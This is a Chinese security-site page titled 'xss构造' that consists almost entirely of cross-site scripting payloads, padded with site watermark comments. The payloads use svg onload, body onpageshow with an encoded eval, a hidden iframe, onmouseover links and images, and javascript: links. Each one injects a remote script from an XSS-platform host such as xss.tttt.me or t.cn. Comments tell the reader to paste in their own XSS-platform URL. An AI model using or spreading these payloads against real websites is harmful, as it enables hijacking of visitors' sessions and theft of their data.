安云网 - AnYun.ORG | 专注于网络信息收集、网络数据分享、网络安全研究、网络各种猎奇八卦。
当前位置: 安云网 > 技术关注 > 网络安全 > xss构造

xss构造

时间:2017-07-10来源:未知 作者:安云网点击:
svg/onload=s=createElement(script);body.appendChild(s);s.src=url; body/onpageshow=eval(unescape(/var%20b%3Ddocument.createElement%28%22script%22%29%3Bb.src%3D%22http%3A%2F%2Fxss.tttt.me%2FneKXvH%3F%22%2BMath.random%28%29%3B%28document.getElementsByTagName

<svg/onload=s=createElement('script');body.appendChild(s);s.src='url';>                          

//安云网咨询系统


//copyright AnYun.ORG

<body/onpageshow=eval(unescape(/var%20b%3Ddocument.createElement%28%22script%22%29%3Bb.src%3D%22http%3A%2F%2Fxss.tttt.me%2FneKXvH%3F%22%2BMath.random%28%29%3B%28document.getElementsByTagName%28%22HEAD%22%29%5B0%5D%7C%7Cdocument.body%29.appendChild%28b%29%3B/.source));>

//copyright AnYun.ORG


//安云网,anyun.org

//自己吧xss平台的img的代码复制进去

//ANYUN.ORG

//下面的自己吧xss的url粘贴进去,自己体会                  

//内容来自安云网


//内容来自安云网

<iframe/onload=s=createElement('script');body.appendChild(s);s.src='t.cn';height=0 width=0>

//内容来自安云网


//ANYUN.ORG

<a href="#" onmouseover="var vv='scr';vvv=vv+'ipt';se = document.createElement(vvv);se.src = 'http://t.cn/';document.getElementsByTagName('head')[0].appendChild(se);">aa</a>

//ANYUN.ORG


//内容来自安云网

//鼠标划过该链接执行

//安云网,anyun.org


//copyright AnYun.ORG

<a href="#" onmouseover="var vv='scr';vvv=vv+'ipt';se = document.createElement(vvv);se.src =  //ANYUN.ORG

'http://t.cn/';document.getElementsByTagName('head')[0].appendChild(se);"><img src="http://www.baidu.com/img/bdlogo.gif" style="position:absolute;left:123px;top:123px;"></a> //安云网,anyun.org


//安云网咨询系统

//鼠标划过该图片执行 //安云网咨询系统


//安云网咨询系统


//安云网咨询系统

<input type="image" onmouseover="var vv='script';se = document.createElement(vv);se.src = 'http://t.cn/';document.getElementsByTagName('head')[0].appendChild(se);" style="border:50px solid #fff;" value=" "> //内容来自AnYun.ORG


//安云网咨询系统

//鼠标划过该button执行 //copyright AnYun.ORG


//内容来自安云网

<a href="javascript:var vv='scr';vvv=vv+'ipt';se = document.createElement(vvv);se.src = 'http://t.cn/';document.getElementsByTagName('head')[0].appendChild(se);">点我</a>

//安云网,anyun.org


//内容来自AnYun.ORG

//a标签的JavaScript伪协议点击执行

//内容来自AnYun.ORG


//安云网,anyun.org

顶一下
(0)
0%
踩一下
(0)
0%
------分隔线----------------------------
发表评论
请自觉遵守互联网相关的政策法规,严禁发布色情、暴力、反动的言论。
评价:
验证码: 点击我更换图片
相关内容